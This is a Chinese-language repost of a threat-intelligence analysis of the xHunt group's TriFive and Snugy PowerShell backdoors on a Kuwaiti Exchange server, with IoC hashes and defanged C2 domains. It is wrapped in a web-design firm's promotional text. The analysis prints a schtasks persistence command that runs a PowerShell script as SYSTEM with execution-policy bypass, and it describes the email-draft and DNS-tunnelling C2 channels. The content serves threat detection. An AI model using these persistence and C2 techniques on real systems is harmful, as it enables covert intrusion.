這篇文章將為大家詳細(xì)講解有關(guān)TriFive和Snugy后門的示例分析，小編覺得挺實(shí)用的，因此分享給大家做個(gè)參考，希望大家閱讀完這篇文章后可以有所收獲。

創(chuàng)新互聯(lián)主要從事成都網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)、網(wǎng)頁設(shè)計(jì)、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)。立足成都服務(wù)煙臺(tái),10余年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠、服務(wù)專業(yè),歡迎來電咨詢建站服務(wù):13518219792

寫在前面的話

xHunt活動(dòng)從2018年7月份一直活躍至今，這個(gè)組織的主要目標(biāo)針對(duì)的是科威特政府和航運(yùn)運(yùn)輸組織。近期研究人員發(fā)現(xiàn)，xHunt的攻擊者又攻擊了科威特一家機(jī)構(gòu)的Microsoft Exchange服務(wù)器。雖然我們無法確認(rèn)攻擊者是如何入侵這臺(tái)Exchange服務(wù)器的，但是根據(jù)此次事件相關(guān)的計(jì)劃任務(wù)創(chuàng)建時(shí)間戳，我們發(fā)現(xiàn)攻擊者早在2019年8月22日之前就已經(jīng)能夠訪問這臺(tái)Exchange服務(wù)器了。在此活動(dòng)中，攻擊者使用了兩個(gè)后門，一個(gè)是TriFive，另一個(gè)是Snugy的變種版本（這是一個(gè)Web Shell，我們稱之為BumbleBee）。

TriFive和Snugy后門本質(zhì)上是PowerShell腳本，可以幫助攻擊者訪問被入侵的Exchange服務(wù)器，并使用不同的C2信道來進(jìn)行通信。TriFive后門使用的是一個(gè)基于電子郵件的信道，這個(gè)信道可以使用Exchange Web服務(wù)（EWS）在被入侵的電子郵件帳號(hào)的已刪除郵件夾中創(chuàng)建郵件草稿。Snugy后門則使用的是DNS隧道來實(shí)現(xiàn)命令控制。

TriFive和Snugy后門

在2020年9月份，我們發(fā)現(xiàn)xHunt攻擊者入侵了科威特的一家機(jī)構(gòu)組織。該組織的Exchange服務(wù)器上出現(xiàn)了通過IIS進(jìn)程w3wp.exe執(zhí)行可以命令的行為。攻擊者在發(fā)送這些命令時(shí)，使用的是一個(gè)被稱為BumbleBee的Web Shell，它已經(jīng)被安裝在了受感染的Exchange服務(wù)器。我們?cè)诜治龇?wù)器日志時(shí)，發(fā)現(xiàn)了兩個(gè)由攻擊者創(chuàng)建的計(jì)劃任務(wù)，這兩個(gè)任務(wù)都會(huì)運(yùn)行惡意的PowerShell腳本。我們現(xiàn)在還無法確定攻擊者是否使用了這些PowerShell腳本中的任何一個(gè)來安裝webshell，但是我們相信攻擊者在日志記錄事件之前就已經(jīng)訪問過這臺(tái)Exchange服務(wù)器了。

攻擊者在這臺(tái)Exchange服務(wù)器上創(chuàng)建了兩個(gè)任務(wù)，即ResolutionHosts和ResolutionHosts，這兩個(gè)任務(wù)都是在c:\Windows\System32\tasks\Microsoft\Windows\WDI文件夾中創(chuàng)建的。默認(rèn)情況下，該文件夾在Windows系統(tǒng)上還存儲(chǔ)一個(gè)合法的ResolutionHost任務(wù)，具體如下圖所示。合法的ResolutionHost任務(wù)與Windows診斷基礎(chǔ)結(jié)構(gòu)（WDI）解析主機(jī)關(guān)聯(lián)，它主要用于為系統(tǒng)上出現(xiàn)的問題提供交互式故障排除。我們認(rèn)為，攻擊者選擇這個(gè)任務(wù)名稱主要是為了隱藏自己的攻擊活動(dòng)。

在2019年8月28日和2019年10月22日，攻擊者創(chuàng)建了ResolutionHosts和ResolutionHosts任務(wù)，以運(yùn)行兩個(gè)獨(dú)立的基于PowerShell的后門。攻擊者使用這兩個(gè)調(diào)度任務(wù)作為持久性方法，因?yàn)橛?jì)劃任務(wù)會(huì)反復(fù)運(yùn)行這兩個(gè)PowerShell腳本，不過運(yùn)行的時(shí)間間隔不同。下圖顯示的是這兩個(gè)任務(wù)及其相關(guān)的創(chuàng)建時(shí)間、運(yùn)行間隔和執(zhí)行的命令。這兩個(gè)任務(wù)執(zhí)行的命令將嘗試運(yùn)行splwow64.ps1和OfficeIntegrator.ps1，分別是我們稱之為TriFive的后門和CASHY200的變種（我們稱之為Snugy）。這些腳本存儲(chǔ)在系統(tǒng)上的兩個(gè)單獨(dú)的文件夾中，這很可能是為了避免兩個(gè)后門都被發(fā)現(xiàn)和刪除。

上圖還顯示，TriFive后門每5分鐘運(yùn)行一次，而Snugy后門每30分鐘運(yùn)行一次。我們無法確認(rèn)間隔時(shí)間差異背后的確切原因，但可能與后門相關(guān)的C2通道的隱蔽性有關(guān)。比如說，Snugy使用DNS隧道作為C2信道，因此它的間隔可能比TriFive長，與TriFive使用的基于電子郵件的C2信道相比，Snugy使用的是一個(gè)更加明顯的C2信道，因此被檢測到的可能性更高。

我們現(xiàn)在還無法確認(rèn)攻擊者是如何創(chuàng)建ResolutionHosts和ResolutionHosts任務(wù)的。但是，我們知道攻擊者在其他系統(tǒng)上安裝Snugy樣本時(shí)，攻擊者使用的是批處理腳本來創(chuàng)建名為SystemDataProvider和CacheTask的計(jì)劃任務(wù)。比如說，下面的批處理腳本將創(chuàng)建并運(yùn)行名為SystemDataProvider的計(jì)劃任務(wù)，并最終運(yùn)行名為xpsrchvw.ps1的Snugy樣本：

schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\Windows\SideShow\SystemDataProvider” /tr “powershell -exec bypass -file C:\Windows\Temp\xpsrchvw.ps1” /ru SYSTEM & schtasks /run /tn “\Microsoft\Windows\SideShow\SystemDataProvider”

TriFive后門

TriFive是一個(gè)以前從未被發(fā)現(xiàn)過的PowerShell后門，xHunt的攻擊者會(huì)在受感染的Exchange服務(wù)器上安裝這個(gè)后門，并通過一個(gè)計(jì)劃任務(wù)每五分鐘執(zhí)行一次。TriFive通過登錄合法用戶的收件箱并從“已刪除郵件”文件夾中的電子郵件草稿中獲取PowerShell腳本，從而提供了對(duì)Exchange服務(wù)器的持久化后門訪問。TriFive樣本使用了目標(biāo)組織的合法帳戶名和憑據(jù)，這也表明在安裝TriFive后門之前，攻擊者已成功竊取了目標(biāo)的賬戶憑證。

事實(shí)上，基于電子郵件的C2也在Hisoka工具中使用過，雖然Hisoka工具使用電子郵件草稿發(fā)送和接收數(shù)據(jù)，但這些草稿仍保留在草稿文件夾中，而TriFive后門則專門將其電子郵件草稿保存到“已刪除郵件”文件夾中。

為了向后門發(fā)出命令，攻擊者需要登錄到同一個(gè)合法的電子郵件帳戶并創(chuàng)建一個(gè)主題為555的電子郵件草稿，其中就包括了加密和Base64編碼格式的命令。下圖顯示的一封包含演示命令的郵件，主題為555，郵件內(nèi)容為woFyeWt3cw==，該腳本將通過PowerShell執(zhí)行：

為了運(yùn)行攻擊者提供的命令，PowerShell腳本需要登錄到Exchange服務(wù)器上的合法電子郵件帳戶，并檢查“已刪除郵件”文件夾中主題為555的電子郵件。腳本將打開電子郵件草稿，并使用Base64解碼電子郵件消息正文中的內(nèi)容，然后通過從每個(gè)字符中減去10來解密解碼命令內(nèi)容。然后，腳本會(huì)使用PowerShell的內(nèi)置Invoke Expression（iex）cmdlet來生成明文內(nèi)容。在執(zhí)行提供的PowerShell代碼之后，腳本將對(duì)結(jié)果進(jìn)行加密，方法是在每個(gè)字符上加10，并對(duì)密文進(jìn)行Base64編碼。接下來，TriFive會(huì)將命令結(jié)果發(fā)送給攻擊者，并將編碼的密文設(shè)置為電子郵件草稿的消息體，它將保存在主題為555的“已刪除郵件”文件夾中。下圖顯示了TriFive腳本創(chuàng)建的“已刪除郵件”文件夾中的一個(gè)電子郵件草稿樣例，它會(huì)將命令的運(yùn)行結(jié)果以主題為555，消息內(nèi)容為“bQB5AHgAfgB5AH0AeQBmAGsAbgB3AHMAeABzAH0AfgB8AGsAfgB5AHwA”的郵件進(jìn)行發(fā)送。

TriFive PowerShell腳本并不是通過代碼循環(huán)來實(shí)現(xiàn)持久化運(yùn)行的，而是通過前面提到的ResolutionsHosts調(diào)度任務(wù)來實(shí)現(xiàn)其持久化操作。

Snugy后門

我們?cè)赗esolutionHosts任務(wù)中看到的OfficeIntegrator.ps1文件是一個(gè)基于PowerShell的后門，我們將其稱之為Snugy，它將允許攻擊者獲取目標(biāo)系統(tǒng)的主機(jī)名并執(zhí)行命令。Snugy是CASHY200后門的一個(gè)變種版本，攻擊者也曾在之前的xHunt活動(dòng)中使用過這個(gè)后門。在2019年7月，趨勢科技曾為這個(gè)后門創(chuàng)建過檢測簽名-Backdoor.PS1.NETERO.A，這也表明CASHY200的這個(gè)特殊變種已經(jīng)存在一年多了。

Snugy樣本會(huì)隨機(jī)選擇下列域名來作為其C2域名：

hotsoft[.]icu

uplearn[.]top

lidarcc[.]icu

deman1[.]icu

跟CASHY200后門的早期變種版本類似，Snugy變種將使用下列命令來跟自定義域名連接，并嘗試在將ICMP請(qǐng)求發(fā)送到解析IP地址之前解析該域：

cmd /c ping -n 1 .

Snugy將使用下列正則表達(dá)式來從ping命令的結(jié)果中提取出IP地址：

\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b

下面給出的是Snugy后門的命令處理服務(wù)器：

Snugy創(chuàng)建的子域名包含一個(gè)通信類型字段，該字段定義了數(shù)據(jù)字段中元素的順序，下面給出是C2域名結(jié)構(gòu)：

.

跟xHunt有關(guān)的基礎(chǔ)設(shè)施

入侵威脅指標(biāo)IoC

TriFive樣本：

407e5fe4f6977dd27bc0050b2ee8f04b398e9bd28edd9d4604b782a945f8120f

Snugy樣本：

c18985a949cada3b41919c2da274e0ffa6e2c8c9fb45bade55c1e3b6ee9e1393   6c13084f213416089beec7d49f0ef40fea3d28207047385dda4599517b56e127   efaa5a87afbb18fc63dbf4527ca34b6d376f14414aa1e7eb962485c45bf38372 a4a0ec94dd681c030d66e879ff475ca76668acc46545bbaff49b20e17683f99c

Snugy C2域名：

deman1[.]icu

hotsoft[.]icu

uplearn[.]top

lidarcc[.]icu

sharepoint-web[.]com

計(jì)劃任務(wù)名稱：

ResolutionHosts

ResolutionsHosts

SystemDataProvider

CacheTask-

關(guān)于“TriFive和Snugy后門的示例分析”這篇文章就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，使各位可以學(xué)到更多知識(shí)，如果覺得文章不錯(cuò)，請(qǐng)把它分享出去讓更多的人看到。